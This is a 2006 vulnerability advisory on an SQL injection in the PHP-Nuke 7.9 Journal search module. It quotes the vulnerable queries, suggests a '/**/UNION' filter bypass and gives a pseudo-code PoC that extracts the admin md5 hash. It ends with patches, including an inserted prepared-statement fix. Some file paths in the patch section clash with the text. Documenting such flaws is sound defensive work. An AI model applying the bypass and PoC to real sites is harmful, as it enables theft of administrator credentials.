nst-29.txt

2006-10-31T00:00:00
ID PACKETSTORM:51534
Type packetstorm
Reporter Paisterist
Modified 2006-10-31T00:00:00

Description

/*  
--------------------------------------------------------  
[N]eo [S]ecurity [T]eam [NST] - Advisory 29 - 2006-10-31  
--------------------------------------------------------  
Program: PHP-Nuke  
Homepage: http://www.php.net  
Vulnerable Versions: PHP-Nuke <= 7.9  
Risk: Medium  
Impact: Medium Risk  
  
-==PHP-Nuke <= 7.9 Journal module (search.php) "forwhat" SQL Injection  
vulnerability==-  
---------------------------------------------------------  
  
- Description  
---------------------------------------------------------  
PHP-Nuke is an automated news system designed to be used on intranets and  
the Internet. The administrator has total control of his web site and its  
registered users, and has at hand a powerful set of tools to maintain an  
active and 100% interactive, database-driven web site.  
  
- Tested  
---------------------------------------------------------  
localhost & many sites  
  
- Vulnerability Description  
---------------------------------------------------------  
  
In /modules/Journal/search.php the "forwhat" variable is not sanitized  
correctly before it is embedded in the SQL queries. Here is the vulnerable code:  
  
==[ /modules/Journal/search.php 125-136 ]==========================  
[...]  
if ($bywhat == 'aid'):  
    if ($exact == '1') {  
        $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
                j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
                ".$user_prefix."_users u WHERE u.username=j.aid and j.aid='$forwhat' order  
                by j.jid DESC";  
    } else {  
        $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
                j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
                ".$user_prefix."_users u WHERE u.username=j.aid and j.aid like '%$forwhat%'  
                order by j.jid DESC";  
    }  
elseif ($bywhat == 'title'):  
    $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
            j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
            ".$user_prefix."_users u WHERE u.username=j.aid and j.title like  
            '%$forwhat%' order by j.jid DESC";  
elseif ($bywhat == 'bodytext'):  
    $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
            j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
            ".$user_prefix."_users u WHERE u.username=j.aid and j.bodytext LIKE  
            '%$forwhat%' order by j.jid DESC";  
elseif ($bywhat == 'comment'):  
    $sql = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status,  
            j.mdate, j.mtime, u.user_id, u.username FROM ".$prefix."_journal j,  
            ".$user_prefix."_users u, ".$user_prefix."_journal_comments c WHERE  
            u.username=j.aid and c.rid=j.jid and c.comment LIKE '%$forwhat%' order by  
            j.jid DESC";  
endif;  
[...]  
==[ end /modules/Journal/search.php ]==============================  
  
The magic_quotes_gpc PHP directive must be turned Off so that single quotes (')  
are not escaped. We also have to know the prefix used for the database tables  
("nuke_" by default).  
  
In this way, bypassing the SQL injection protection (for example by using  
'/**/UNION ' instead of ' UNION ' in our SQL injections), we can get the admin  
md5 hash without any problems.  
  
==Pseudo-Code Proof of Concept exploit==  
<?php  
/*  
  
Neo Security Team - Pseudo-Code Proof of Concept Exploit  
http://www.neosecurityteam.net  
Paisterist  
  
*/  
set_time_limit(0);  
$host = "localhost";  
$path = "/phpnuke/";  
$port = 80;  
$fp = fsockopen($host, $port, $errno, $errstr, 30);  
$data = ""; /* Here the variables, like "bywhat" and "forwhat", with the SQL  
Injection */  
$p = "";    /* the POST request to $path, carrying $data, is built here */  
$content = "";  
  
if ($fp) {  
    /* we put the POST request on $p variable, sending the data saved on  
    $data. */  
    fwrite($fp, $p);  
  
    /* read the whole HTTP response */  
    while (!feof($fp)) {  
        $content .= fread($fp, 4096);  
    }  
    fclose($fp);  
  
    /* pick the first 32-character hash-looking string out of the response */  
    preg_match("/([a-z0-9]{32})/", $content, $matches);  
  
    if (!empty($matches[0]))  
        print "<b>Hash: </b>" . $matches[0];  
}  
?>  
==Pseudo-Code Proof of Concept exploit==  
  
With this PoC code I get the md5 hash of the first admin (God) of the  
nuke_authors table.  
  
- How to fix it? More information?  
--------------------------------------------------------  
  
You can find a patch on http://www.neosecurityteam.net/foro/  
  
Also, you can modify line 61 of /modules/Journal/search.php, adding  
slashes before the single quotes with the addslashes() function:  
  
==[ /modules/Search/index.php 59-62 ]==========================  
[...]  
else :  
    $forwhat = filter($forwhat, "nohtml");             /* original line */  
    $forwhat = addslashes(filter($forwhat, "nohtml")); /* patched line: escape single quotes */  
endif;  
[...]  
==[ end /modules/Search/index.php ]==============================  
  
That's a temporary solution to the problem. I recommend downloading the  
PHP-Nuke 8.0 version in the next few days... it is not  
free at the moment.  
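The addslashes() patch above only escapes quotes, and it still leaves $forwhat inside the SQL text; the durable fix for the vulnerable code shown in the Vulnerability Description is to pass it as a bound parameter. The following is an added example, not PHP-Nuke's own code or the advisory's patch: the four search branches of /modules/Journal/search.php rebuilt with mysqli prepared statements, which also removes any dependence on magic_quotes_gpc. It assumes a connected mysqli object $db (with mysqlnd, for get_result()), the configured table prefixes $prefix and $user_prefix, and a hypothetical function name journal_search().

```php
<?php
// Added example, not PHP-Nuke's own code: the Journal search dispatch rebuilt
// with mysqli prepared statements, so $forwhat is sent as a bound value and
// never becomes part of the SQL text. Assumes a connected mysqli $db and the
// table prefixes PHP-Nuke reads from its config ($prefix, $user_prefix).

function journal_search(mysqli $db, string $prefix, string $user_prefix,
                        string $bywhat, string $exact, string $forwhat): array
{
    // Which column is searched, and whether the comments table must be joined.
    // The keys are the only accepted values of $bywhat; anything else is rejected.
    $fields = [
        'aid'      => ['j.aid',      false],
        'title'    => ['j.title',    false],
        'bodytext' => ['j.bodytext', false],
        'comment'  => ['c.comment',  true],
    ];
    if (!isset($fields[$bywhat])) {
        throw new InvalidArgumentException('unknown search field');
    }
    [$column, $joinComments] = $fields[$bywhat];

    // Table names come from configuration, not from the request, so building
    // them into the string is fine; the user value only travels as a parameter.
    $from  = "FROM {$prefix}_journal j, {$user_prefix}_users u";
    $where = "WHERE u.username = j.aid";
    if ($joinComments) {
        $from  .= ", {$user_prefix}_journal_comments c";
        $where .= " AND c.rid = j.jid";
    }

    if ($bywhat === 'aid' && $exact === '1') {
        $where .= " AND {$column} = ?";
        $value  = $forwhat;
    } else {
        // A bound parameter is still a LIKE pattern once it reaches the server,
        // so escape % and _ (and the backslash, MySQL's default LIKE escape
        // character) to keep the search literal.
        $where .= " AND {$column} LIKE ?";
        $value  = '%' . addcslashes($forwhat, '%_\\') . '%';
    }

    $sql  = "SELECT j.jid, j.aid, j.title, j.pdate, j.ptime, j.status, "
          . "j.mdate, j.mtime, u.user_id, u.username {$from} {$where} ORDER BY j.jid DESC";
    $stmt = $db->prepare($sql);
    $stmt->bind_param('s', $value);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```

With the value bound, a quote or a '/**/UNION ' sequence in $forwhat can only ever match (or fail to match) journal rows; it cannot change the statement.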
  
- References  
--------------------------------------------------------  
http://www.neosecurityteam.net/index.php?action=advisories&id=29  
  
- Credits  
--------------------------------------------------------  
Search module SQL Injection discovered by Paisterist -> paisterist[dot]nst  
[at] gmail[dot]com  
  
[N]eo [S]ecurity [T]eam [NST] - http://www.neosecurityteam.net/  
  
  
- Greets  
--------------------------------------------------------  
HaCkZaTaN  
K4P0  
Daemon21  
Link  
0m3gA_x  
LINUX  
nitrous  
m0rpheus  
nikyt0x  
KingMetal  
Knightmare  
  
Argentina, Colombia, Chile, Bolivia, Uruguay EXISTS!!  
  
  
/* EOF */  
  
--   
Paisterist  
  
Neo Security Team http://neosecurityteam.net  
  